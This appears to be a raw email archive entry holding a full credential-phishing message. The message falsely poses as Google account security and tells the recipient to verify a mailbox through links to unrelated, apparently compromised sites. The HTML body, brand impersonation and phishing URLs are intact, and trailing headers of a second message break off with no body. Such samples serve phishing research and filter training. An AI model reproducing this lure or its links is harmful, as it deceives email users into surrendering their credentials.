From: Mail Service  <noreply_admin@notion.net.in>
To: jose@monkey.org
Subject: jose@monkey.org Upgrade your mailbox!
Date: 03 Sep 2017 20:25:05 +0300
Message-ID: <20170903202505.05E23D9FFE56DD00@notion.net.in>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_FD4E3DC8.0806406A"
Return-Path: noreply_admin@notion.net.in
X-OriginalArrivalTime: 03 Sep 2017 17:25:07.0410 (UTC) FILETIME=[966CEB20:01D324D9]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 305


------=_NextPart_000_0012_FD4E3DC8.0806406A
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><body><table style=3D"FONT-SIZE: 15px; MAX-WIDTH: 600px; FONT-FAMILY:=
 wf_segoe-ui_normal,&quot;Segoe UI&quot;,&quot;Segoe WP&quot;,Tahoma,Arial,=
sans-serif,serif,EmojiFont; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TR=
ANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(33,33,33); FONT-STYLE: norma=
l; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT:=
 0px; font-variant-ligatures: normal; font-variant-caps: normal; text-decor=
ation-style: initial; text-decoration-color: initial" cellspacing=3D"0" cel=
lpadding=3D"0" border=3D"0">
<TBODY>
<TR>
<td>
<table cellspacing=3D"0" cellpadding=3D"0" width=3D"100%" border=3D"0">
<TBODY>
<TR>
<td align=3D"left"></TD>
<td align=3D"right"><img style=3D"HEIGHT: 32px; WIDTH: 32px; DISPLAY: block=
" src=3D"cid:keyhole.png" width=3D"32" height=3D"32"></TD></TR></TBODY></TA=
BLE></TD></TR>
<TR height=3D16></TR>
<TR>
<td>
<table style=3D"MAX-WIDTH: 600px; BORDER-TOP: rgb(224,224,224) 1px solid; B=
ORDER-RIGHT: rgb(224,224,224) 1px solid; BORDER-BOTTOM-WIDTH: 0px; MIN-WIDT=
H: 332px; BORDER-BOTTOM-COLOR: ; BORDER-LEFT: rgb(224,224,224) 1px solid; b=
order-top-left-radius: 3px; border-top-right-radius: 3px" cellspacing=3D"0"=
 cellpadding=3D"0" width=3D"100%" bgcolor=3D"#4184f3" border=3D"0">
<TBODY>
<TR>
<td height=3D"72" colspan=3D"3"><BR></TD></TR>
<TR>
<td width=3D"32"><BR></TD>
<td style=3D"FONT-SIZE: 24px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,s=
ans-serif; COLOR: rgb(255,255,255); LINE-HEIGHT: 1.25">Secure your Mail Acc=
ount<BR></TD>
<td width=3D"32"><BR></TD></TR>
<TR>
<td height=3D"18" colspan=3D"3"><BR></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<td>
<table style=3D"MAX-WIDTH: 600px; BORDER-RIGHT: rgb(240,240,240) 1px solid;=
 BORDER-TOP-COLOR: ; MIN-WIDTH: 332px; BORDER-BOTTOM: rgb(192,192,192) 1px =
solid; BORDER-LEFT: rgb(240,240,240) 1px solid; BORDER-TOP-WIDTH: 0px; bord=
er-bottom-left-radius: 3px; border-bottom-right-radius: 3px" cellspacing=3D=
"0" cellpadding=3D"0" width=3D"100%" bgcolor=3D"#fafafa" border=3D"0">
<TBODY>
<TR height=3D16>
<td rowspan=3D"3" width=3D"32"><BR></TD>
<td><BR></TD>
<td rowspan=3D"3" width=3D"32"><BR></TD></TR>
<TR>
<td>
<P>Dear <FONT face=3D"verdana, sans-serif"><SPAN style=3D"FONT-WEIGHT: bold=
er; font-stretch: inherit"></SPAN></FONT><FONT color=3D#1a44e5>jose</FONT>,=
</P>
<P style=3D"PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGI=
N: 1em 0px; PADDING-RIGHT: 0px"><FONT face=3D"verdana, sans-serif">We're no=
 longer able to verify your identity, and we strongly encourage you to veri=
fy to increase your mail experience and help fight spam &amp; malicious mai=
ls sent to </FONT><FONT face=3D"verdana, sans-serif"><FONT color=3D#1854e7>=
jose@monkey.org.</FONT></FONT></P>
<P>.<SPAN>&nbsp;</SPAN><I>Do not forward or give this security info to anyo=
ne.</I><SPAN>&nbsp;</SPAN>Please visit your account's<SPAN>&nbsp;</SPAN><A =
href=3D"http://injeteck.com.br/_includes/js/mailupgrade?email=3Djose@monkey=
=2Eorg" rel=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D=
"https://www.google.com/url?hl=3Den&amp;q=3Dhttp://greensupplements.co.uk/w=
p-admin/js/AMEN?email%3D%5B%5B-Email-%5D%5D&amp;source=3Dgmail&amp;ust=3D15=
04471404611000&amp;usg=3DAFQjCNG0TcmZm1ElHxzYXalRnZdi6KM2IA">sign-in &amp; =
security settings</A><SPAN>&nbsp;</SPAN>to ensure your account is safe.</P>=

<DIV style=3D"TEXT-ALIGN: center">
<P dir=3Dltr><B style=3D"FONT-SIZE: 24px; FONT-WEIGHT: bold; TEXT-ALIGN: ce=
nter"></B></P></DIV>
<P>Sincerely,<BR>Mail Security Accounts Team</P></TD></TR>
<TR height=3D32></TR></TBODY></TABLE></TD></TR>
<TR height=3D16></TR>
<TR>
<td style=3D"FONT-SIZE: 10px; MAX-WIDTH: 600px; FONT-FAMILY: Roboto-Regular=
,Helvetica,Arial,sans-serif; COLOR: rgb(188,188,188); LINE-HEIGHT: 1.5"><BR=
></TD></TR>
<TR>
<td>This email can't receive replies. For more information, visit the<SPAN>=
&nbsp;</SPAN><A style=3D"TEXT-DECORATION: none; COLOR: rgb(77,144,254)" hre=
f=3D"http://injeteck.com.br/_includes/js/mailupgrade?email=3Djose@monkey.or=
g" rel=3D"noopener noreferrer" target=3D_blank data-saferedirecturl=3D"http=
s://www.google.com/url?hl=3Den&amp;q=3Dhttp://greensupplements.co.uk/wp-adm=
in/js/AMEN?email%3D%5B%5B-Email-%5D%5D&amp;source=3Dgmail&amp;ust=3D1504471=
404612000&amp;usg=3DAFQjCNGEi2QlswSOALyDcC5uYvq5WnIdRQ">Google Accounts Hel=
p Center</A>.=A9Google Inc.,<SPAN>&nbsp;</SPAN><SPAN class=3D"m_28024734929=
78103845m_495909400127577140m_-1623632448400050077gmail-contextualExtension=
Highlight m_2802473492978103845m_495909400127577140m_-1623632448400050077gm=
ail-ms-font-color-themePrimary m_2802473492978103845m_495909400127577140m_-=
1623632448400050077gmail-ms-border-color-themePrimary m_2802473492978103845=
m_495909400127577140m_-1623632448400050077gmail-ident_754_809" style=3D"BOR=
DER-TOP-COLOR: rgb(130,186,0); BORDER-BOTTOM: rgb(130,186,0) 1px dashed; BO=
RDER-LEFT-COLOR: rgb(130,186,0); COLOR: rgb(130,186,0); BORDER-RIGHT-COLOR:=
 rgb(130,186,0)">1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</S=
PAN></TD></TR></TBODY></TABLE></BODY></HTML>
------=_NextPart_000_0012_FD4E3DC8.0806406A
Content-Type: image/png; name="keyhole.png"
Content-Transfer-Encoding: base64
Content-ID: <keyhole.png>

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
FksWd0bJR8VF1UdNRXtFl0VLl1gsWbPkRoxajCCmPRYfGxV7JHZyqffS3UuH4+ziCuPuLjNc
lrPs2nK15anLz66QX8FZcSoeGx8d3xD/iRPCqeVMrvRfuXflBNeTu4f7kufGK+eN8V34ZfyR
BJeEsoTRRJfEXYljSa5JFUnjAk9BteB1sl/ygeSplJCUoykzqdGpzWmEtPi000IlYYqwK10z
PSe9L8M0ozBDuspp1e5VE6JA0ZFMKHNZZruYjv5M9UiMJJslg1kLs2qy3mdHZZ/KUcwR5vTk
muRuyx3J88n7fjVmNXd1Z752/ob8wTXuaw6thdauXNu5Tnddwbrh9b7rj20gbUjZ8MtGy41l
G99uit7UUaBRsL5gaLPv5sZCuUJR4b0tzlsObMVsFWzt3WazrWrblyJe0fViy+KK4k8l3JLr
31l9V/ndzPaE7b2l9qX7d+B2CHfc3em681iZYlle2dCu4F2t5czyovK3u1fsvlZhW3FgD2mP
ZI+0MqiyvUqvakfVp+qk6oEaj5rmvep7t+2d2sfb17/fbX/TAY0DxQc+HhQcvH/I91BrrUFt
xWHc4azDz+ui6rq/Z39ff0TtSPGRz0eFR6XHwo911TvU1zeoN5Q2wo2SxrHjccdv/eD1Q3sT
q+lQM6O5+AQ4ITnx4sf4H++eDDzZeYp9qukn/Z/2ttBailqh1tzWibakNml7THvf6YDTnR3O
HS0/m/989Iz2mZqzymdLz5HOFZybOZ93fvJCxoXxi4kXhzpXdD66tOTSna6wrt7LgZevXvG5
cqnbvfv8VZerZ645XTt9nX297Yb9jdYeu56WX+x+aem172296XCz/ZbjrY6+BX3n+l37L972
un3ljv+dGwOLBvruLr57/17cPel93v3RB6kPXj/Mejj9aP1j7OOiJwpPKp6qP6391fjXZqm9
9Oyg12DPs4hnj4a4Qy//lfmvT8MFz6nPK0a0RupHrUfPjPmM3Xqx9MXwy4yX0+OFvyn+tveV
0auffnf7vWdiycTwa9HrmT9K3qi+OfrW9m3nZOjk03dp76anit6rvj/2gf2h+2P0x5Hp7E/4
T5WfjT93fAn88ngmbWbm3/eE8/syOll+AAAGwElEQVR4AeVbXWgcVRQ+d3Y3CTW7af5fqjFN
aaGplSJWJLY2FqEPRSGiD33SKAVBRB9S6UPDkgqiPii+CAVrn+pPRIpPgtL0x+A/gtZgC0rr
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

------=_NextPart_000_0012_FD4E3DC8.0806406A--


From jose@monkey.org Tue Sep  5 21:27:31 2017 +0000
Return-Path: helenshidl@inbox.ru
Delivered-To: jose@monkey.org
X-FDA: 73253129502.25.feast21_7bdcc49726103
X-Spam-Summary: 73,5,0,95cb6ecda6abf488,d41d8cd98f00b204,helenshidl@inbox.ru,,RULES_HIT:41:46:72:150:152:355:379:387:455:541:543:837:962:966:967:969:973:978:983:988:989:1183:1189:1208:1221:1256:1260:1263:1313:1314:1345:1381:1390:1394:1395:1431:1432:1437:1516:1517:1518:1535:1543:1545:1575:1589:1594:1676:1711:1730:1776:1792:2069:2070:2145:2194:2196:2197:2198:2199:2200:2201:2202:2525:2568:2610:2627:2682:2685:2689:2693:2733:2741:2859:2890:2892:2902:2909:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3165:3353:3653:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4031:4042:4120:4384:4385:4395:4552:4636:5007:6653:6657:6688:7278:7556:7809:7885:8550:8599:8603:8987:9009:9025:9036:9043:9080:9388:9416:9704:9908:10012:10049:10346:10394:10400:10432:10433:10463:10464:11026:11529:11639:11658:11914:11984:12043:12049:12050:12051:12217:12295:12438:12519:12764:12903:12926:13038:13046:13139:13234:13235:13236:13237:13255:13975
X-HE-Tag: feast21_7bdcc49726103
X-Filterd-Recvd-Size: 9090
Received: from f458.i.mail.ru (f458.i.mail.ru [185.5.136.191])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  5 Sep 2017 21:27:31 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=inbox.ru; s=mail;
	h=Content-Type:Message-ID:Reply-To:Date:MIME-Version:Subject:From; bh=YaMvnEvYkZvpBgdaJ7A8puv3CPIydsM8ovy2bAy7alM=;
	b=majhUxDe7UTW6ieOdajN+We3kPysCAoL/XheSAfLkqwD91J3QvnGEfbxU2K0lSUA21aPv34k4wlGCzbpXZNh8mEmdE7UCQJZjtZuU0Dxj6BQWESnHiquUtyums870TfKuYR7oZVXom+zGmgINwd5hiLRxatOMO7HXy1tpf6Az9c=;
Received: by f458.i.mail.ru with local (envelope-from <helenshidl@inbox.ru>)
	id 1dpLMI-0003Qp-DS; Wed, 06 Sep 2017 00:26:10 +0300
Received: by e.mail.ru with HTTP;
	Wed, 06 Sep 2017 00:26:10 +0300
